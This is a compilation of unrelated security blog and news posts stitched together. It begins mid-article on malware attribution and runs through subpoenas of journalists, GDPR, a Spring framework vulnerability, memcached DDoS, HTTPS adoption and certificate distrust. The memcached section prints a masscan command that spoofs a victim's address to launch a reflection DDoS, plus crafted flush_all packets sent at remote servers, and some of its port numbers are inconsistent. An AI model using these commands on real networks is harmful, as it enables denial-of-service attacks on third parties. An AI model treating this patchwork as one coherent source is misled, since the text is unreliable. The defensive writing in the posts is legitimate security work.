Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler did some specific optimizations that made the code unique (see Figure 5). In particular the compiler optimized out both “flags” (not used in the function) and “read_proc” (statically link function) from the parameters of LoadDll, but it couldn’t optimize out a “if (read_proc)” check even though it is useless since “read_proc” is not passed as a parameter anymore.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015

The “read_proc” function itself is also identical to one from source code (see Figures 6 and 7) and as you can see in Figure 8, it also gets called exactly the same way as the original source code from

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation

The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice the function looks different then the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015

First, we thought that the authors added new checks before calling read_proc function, making clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we figured that read_proc didn’t exist anymore. Instead it was compiled inline resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.

Also the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.

The Bottom Line – Evidence is Inconclusive

In conclusion, we believe that this is not enough evidence to substantiate a claim that Olympic Destroyer and new versions of TVSpy using the same modified source code are built by the same author.

The more probable version for us is that the sample was built on a new compiler that further optimized the code. It would still mean that both new version of TVSpy and Olympic Destroyer are built using the same toolchain configured in the very same way (to enable full optimization and link C++ runtime statically). We actually went to the extent of compiling the LoadDLL on MS Visual Studio 2017 with C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.

Although we would have liked to finally solve the dilemma, and unveil which were the actors behind the Olympic Destroyer attack, we ended up with more questions than answers, but admittedly, that’s what research sometimes is about.

First, why would the authors of an allegedly state sponsored malware use an old LoadDLL project from an open source project from 2014? It is hard to believe that they could not come up with their own implementation or use much more advanced open-source projects for that, and definitely not relying on an educational prototype buried way beyond the first page of results in Google.

Or maybe the actors were not that much advanced as we would like to think, maybe seeing this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another red flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?

Maybe all of the above?

At the beginning of this article we stated that attribution is not just hard, it’s often a wilderness of mirrors and more often than not, a bit anticlimactic. As a matter of fact, that was quite a precise prediction.

The post From Russia(?) with Code appeared first on Lastline.

"Faster payment" scam is not quite what it seems

I see a lot of "fake boss" fraud emails in my day job, but it's rare that I see them sent to my personal email address. These four emails all look like fake boss fraud emails, but there's something more going on here. From:    Ravi [Redacted] Reply-To:    Ravi [Redacted] To: Date:    23 February 2018 at 12:02

An increasing number of journalists have recently faced subpoenas

Wikimedia Commons

In mid-January, two police officers visited the home of documentary filmmaker Nora Donaghy in Los Angeles, showed her a search warrant, and seized her cell phone. She was also subpoenaed to testify in a grand jury trial about her communications with a source.

Three months into 2018, the most under the radar threat to press freedom has shown itself to be not arrests or attacks on journalists, but rather subpoenas to produce documents or attempt to force journalists to testify about their sources.

While few of these cases have made national headlines because the Trump administration has not been involved, journalists in state and local jurisdictions have been subpoenaed to testify in court by government actors five times already this year, in addition to at least five times in 2017. (Update: Shortly after this post was published, Freedom of the Press Foundation became aware of a sixth subpoena in 2018.)

Donaghy’s colleague William Erb was issued a similar subpoena. Although several news organizations have reported that a ruling was made on these subpoenas, no decision has been made public. Additionally, three Chicago-based newspapers—Chicago Sun-TimesChicago Tribune, and Daily Herald— were subpoenaed in January 2018 to produce copies of all stories they had run about the fatal police shooting of teenager Laquan McDonald.

In December 2017, investigative journalist Jamie Kalven was subpoenaed by defense attorneys for a Chicago police officer to testify and reveal details about his sources in the criminal trial of the officer in Cook County, Illinois. A month prior, across the country in San Diego, freelance reporter Kelly Davis was ordered to testify at a deposition by the County of San Diego and turn over unpublished materials used in her reporting. These subpoenas, both of which were later quashed, are just two examples of subpoenas against journalists last year.

(Note: The U.S. Press Freedom Tracker does not count legal orders by private parties, but rather only those issued by government prosecutors or agencies ordering journalists to testify in court. We also count legal orders brought by private parties when government officials subpoena journalists in a private capacity.)

When we launched the U.S. Press Freedom Tracker, we weren’t counting legal actions like subpoenas and prior restraint the way we were arrests. While the Tracker has highlighted each individual instance of assaults and arrests since its inception, we predicted that subpoenas would be less common. The Tracker has only been documenting press freedom violations that have occurred since January 2017, so it’s difficult to make conclusions about the prevalence of subpoenas. But the sudden uptick in subpoenas served on journalists just in the past six months is deeply worrying.

To reflect the frequency and press freedom significance of these subpoenas, we modified the counter on the Tracker’s homepage. Although previously it displayed the number of border stops of journalists, it now shows the number of subpoenas.

Legal action that mandates journalists to turn over their reporting materials or reveal information about their sources is always concerning. Investigative journalism, and journalism that challenges power, requires the ability of journalists to keep their sources and reporting processes confidential—especially in the face of legal process.

“A democracy requires a free flow of information to the public.  But if a journalist may be forced to disclose the identity of a confidential source, then potential whistleblowers who are concerned about maintaining their anonymity will be less likely to come forward with important information about government or corporate misconduct. So ultimately the public loses out on this valuable information, and the health of our democracy suffers,” says Sarah Matthews, Staff Attorney at Reporters Committee for Freedom of the Press.

It’s a decades-old problem. Journalists have, since the 1970s, gone to jail rather than give up their sources in court. In response, thankfully, many states have “press shield” or “reporter’s privilege” laws. Such laws, which exist in approximately 40 states, aim to provide at least some protection for journalists to avoid testifying about their sources or information that they obtained as part of their newsgathering processes.

Unfortunately, not every state has such laws, and many reporter’s privilege statutes were written decades ago and are not longer adequate in the digital age. While the prospect for passing a strong federal shield law faces increasingly long odds (and could potentially have unintended consequences for press freedom), state legislatures can provide important protections to journalists by updating or passing new press shield laws that take into account the shifting nature of online journalism.

Subpoenaing for journalists’ confidential information may be a long-standing problem, but at least on the state and local level, not one that will be going away anytime soon. We’ll continue to systematically document every such incident with the U.S. Press Freedom Tracker as long as the practice persists.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shakeup since the dawn of the internet and it is just weeks before it comes into force on 25th May. GDPR comes with potentially head-spinning financial penalties for businesses found not complying, so it really is essential for any business which touches EU citizen's personal data, to thoroughly do their privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

How to Prevent a Breach From Spring Break

Spring Break vulnerability

Spring Break, the latest named vulnerability, is more serious than the moniker implies. Spring Break is a critical remote code execution vulnerability in Pivotal Spring REST, one of the most popular frameworks for building web applications, and the effects of this vulnerability are widespread.

A patch for Spring Break has been available since September of last year, but the vulnerability broke into the news only last week, after the researchers who discovered Spring Break published their findings. The researchers agreed to hold back publishing until now, allowing organizations more time to update their applications. Pivotal recommended patching the vulnerability as soon as possible, in a blog post from Spring Data Project Lead Oliver Gierke. Yet even after six months, many organizations with applications built using the Spring REST component are likely still unpatched.

The attention Spring Break is getting in the media and in security circles is warranted, because of the urgency in patching affected applications, and because it raises serious concerns about application security as a whole. It’s notoriously difficult for businesses to maintain their software and patch vulnerabilities in components, whether they be commercial or open source libraries and frameworks. That’s because many developers are unaware of the components in their applications, and no one is assigned the responsibility to update components when a new version is available.

The consequences of inaction are severe. We don’t know at this point if the easily-exploitable Spring Break vulnerability was used in any attacks, but a similar RCE vulnerability found in Apache Struts last year was the root of a recent mega-breach, which put at risk the data of 143 million Americans.

With so much of our economy dependent on software, we can’t afford to leave it to chance that unpatched applications will not be discovered or exploited by bad actors. Fortunately, there are some essential but achievable steps organizations can take to secure their applications from known vulnerabilities in components.

1. Set a policy

Set a policy establishing that component vulnerabilities are important to the business, just like other non-functional requirements such as availability. Having a policy can also ensure that there’s traceability between security requirements and regulations. Several industry regulations, including the recently enacted New York Department of Financial Services rules, along with healthcare and PCI rules, require organizations to manage risk from third-party components.

2. Create a baseline inventory

There are several ways to build an inventory, including looking at source control or component repositories. One of the most reliable methods may be leveraging security testing you are already doing. Some static analysis providers may already be creating an inventory of components for you through software composition analysis. An inventory can be invaluable to the security team’s response to a newly announced vulnerability, allowing you to focus your efforts on the applications that you know have the vulnerable component.

3. Educate developers

Some developers may be unaware that they need to monitor for new security patches, or that the components they use may rely on other components that may not be secure. CA Veracode research last year found that a vulnerability in Apache Commons Collections (ACC) had spread to more than 80,000 other components that used the ACC component. Fortunately, a focus on developer education leads to measurable results. Our research for the State of Software Security shows that organizations using developer education, whether delivered in one on-one sessions or through self-training video courses, saw improvements in flaw reduction.

4. Integrate security testing throughout the development lifecycle

As development teams make more changes to their applications, it’s important to keep the inventory, and the security picture, up to date. Software composition analysis makes this easy by collecting information about your application’s open source components at the same time that static analysis is conducted – including open source components used by compiled libraries for which you have no source code.

5. Shift the mindset

The functionality open source components deliver can be an asset to a development team, but keep in mind that the asset is offset by technical debt that requires regular payments, in the form of applying regularly released updates to the open source library. And just as with regular debt, failure to make regular payments on technical debt can have catastrophic consequences downstream.

Too often we begin to focus on preventive measures like these after the damage has been done. It’s time to take action to make sure you don’t get breached by the next Spring Break, whatever it may be called.


To learn more about how to reduce risk from third-party components, watch a short video and download our whitepaper. Check out the video below, with CA Veracode VP of Research Chris Eng, explaining how to determine whether a branded vulnerability, like Heartbleed, Shellshock or Spring Break, requires fast action or is more hype than harm.


Some notes on memcached DDoS

I thought I'd write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:

masscan -pU:11211 --banners | grep memcached

This example scans the entire Internet (/0). Replaced with your address range (or ranges).

This produces output that looks like this:

Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13

The "banners" check filters out those with valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use  the 'cut' to grab just column 6:

... | cut -d ' ' -f 6 | cut -d: -f1

You often get multiple responses to just one query, so you'll want to sort/uniq the list:

... | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).

People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don't know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.

masscan -iL amplifiers.txt -pU:11211 --spoof-ip --rate 100000

I point this out to show how there's no magic in exploiting this. Numerous exploit scripts have been released, because it's so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.

However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There's a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It's not a good security barrier.

Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It's pretty straightforward.

The easiest amplification attacks is to send the "stats" command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.

A harder, but more effect attack uses a two step process. You first use the "add" or "set" commands to put chunks of data into the server, then send a "get" command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single "get" command.

That's why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.

Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack ("kill switch")

If they are using the more powerful attack against you, you can neuter it: you can send a "flush_all" command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.

I'm going to describe how I would do this.

First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.

tcpdump -i -w attackers.pcap src port 11221

Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):

tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt

Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:

echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u 11211

Capture this packet using tcpdump or something, and save into a file "flush_all.pcap". If you want to skip this step, I've already done this for you, go grab the file from GitHub:

Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:

masscan -iL amplifiers.txt -pU:112211 --pcap-payload flush_all.pcap

Reportedly, "shutdown" may also work to completely shutdown the amplifiers. I'll leave that as an exercise for the reader, since of course you'll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

Once Upon A Time In Shaolin – Enterprise Security Weekly #82

This week, Paul and John are accompanied by Eyal Neemany, Senior Cyber Security Researcher at Javelin Networks! In the news, we have updates from Duo Security, SolarWinds, AlgoSec, Martin Shkreli, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

How secure are news sites? A report from the first year of Secure The News

Header from the Secure The News project

For over a year now, Secure The News has automatically monitored the HTTPS encryption practices at more than 100 major news sites around the world. Secure The News is a Freedom of the Press Foundation project built to regularly update a scorecard of some 131 news sites. We encourage sites to climb up those rankings because well-configured HTTPS encryption can protect reader privacy, enhance site security, and make important reporting harder to censor or manipulate.

We're pleased to report that since we began monitoring in late 2016, HTTPS encryption has seen a pronounced increase in the quality and reach of its deployment among news sites, and we continue to improve the tools we use to monitor that rise.

Let's start with the stats. We can see the overall rise in HTTPS deployment and quality by monitoring the "grades" we give sites based on their use of HTTPS. Each dot on this graph represents a the grade from a sampled scan, while the line shows the average grade over time. That grade, out of 100, has risen from about 31 points at the end of 2016 to over 53 points now. A major improvement, to be sure, but with plenty of room to get better.

Chart showing average and a sample of grades from Secure The News scans

In several key categories, we've compared our very first evaluation of the 131 news sites we monitor with the most recent.

  • HTTPS encryption is available on two-thirds of sites we're monitoring—89 of 131. That's up from just over one-third, or 48 sites, when we first ran tests starting in late November 2016.

  • Nearly 60% now offer HTTPS encryption by default. That's up from just 22% on our first scans—a massive leap in under 18 months.

  • Another exciting development for the nerds: the use of HSTS (HTTP strict transport security), which aims to keep browsers from ever using an insecure connection, is way up: From just 9% of sites in our first scans to up over 25% now.

In our first year of running Secure The News, we've made a few key improvements to the site as well.

In early 2017 we created a Twitter bot that would post changes to the scorecard each weekday. Now whenever a site turns on HTTPS—or improves their HTTPS security, which readers might not otherwise spot—we post a tweet detailing the change.

We also released the code powering Secure The News as a free software project in February 2017. It is licensed under the GNU AGPL software license, which means improvements made by other people using the software can be folded back into our code.

Finally, we added an API for accessing current and historical scan data. That API was used to collect the statistics in this post and currently powers the Twitter bot. We’ll provide more information about the API, and about other new developments to Secure the News, in the near future.

Strong, well-configured HTTPS encryption is a must-have for news sites operating on the modern Web, and it’s heartening that the first year of Secure The News has recorded so many improvements on that front. Press freedom must include the ability to read free from surveillance, censorship, or manipulation, and we’ll continue to push news sites to take the important technical steps necessary to achieve that goal.

Tax Phishing Scams Are Back: Here Are 3 to Watch Out For

This Year’s Crop of Tax Phishing Scams Target Individuals, Employers, and Tax Preparers Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams targeting employers, individuals, and even tax preparers that are currently making the rounds. Employers: W-2 Phishing Emails The… Read More

The post Tax Phishing Scams Are Back: Here Are 3 to Watch Out For appeared first on .

Distrust of the Symantec PKI: Immediate action needed by site operators

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 

The DevTools message you will see if you need to replace your certificate before Chrome 66.
Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.

The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
First Canary
First Beta
Stable Release
Chrome 66
January 20, 2018
~ March 15, 2018
~ April 17, 2018
Chrome 70
~ July 20, 2018
~ September 13, 2018
~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.

Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.


Scientific American has a nice write-up of the theoretical physicist who discovered nuclear fission and was denied credit, yet assigned blame:

While the celebrity Meitner deserved was blatantly denied her, an undeserved association with the atomic bomb was bestowed. Meitner was outright opposed to nuclear weapons: “I will have nothing to do with a bomb!” Indeed, she was the only prominent Allied physicist to refuse an invitation to work on its construction at Los Alamos.

  • 1878 born in Vienna, Austria, third of eight children in middle-class family
  • 1892 at age 14 offered no more school, by 19th-century Austrian standards for girls. begins private lessons
  • 1905 earns PhD in physics from University of Vienna
  • 1907 moves to Berlin to access modern lab for research. denied her own lab because a woman, given an office in a basement closet, forced to use bathroom in a restaurant “down the street”
  • 1908 publishes three papers
  • 1909 publishes six papers
  • 1917 given salary and independent physics position
  • 1926 first woman in Germany to be made full professor
  • 1934 intrigued by Fermi work, begins research into nuclear reaction of uranium
  • 1938 Nazi regime forces her to leave Germany, because Jewish
  • 1944 Nobel prize awarded to the Berlin man who ran the lab she used for experiments

Amazing to see how determined she was and how she blazed a trail for others to do good. And yet the things she did, men wouldn’t give her credit for, while the thing she opposed was blamed on her instead.

Insecure by design: What you need to know about defending critical infrastructure

Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.

To read this article in full, please click here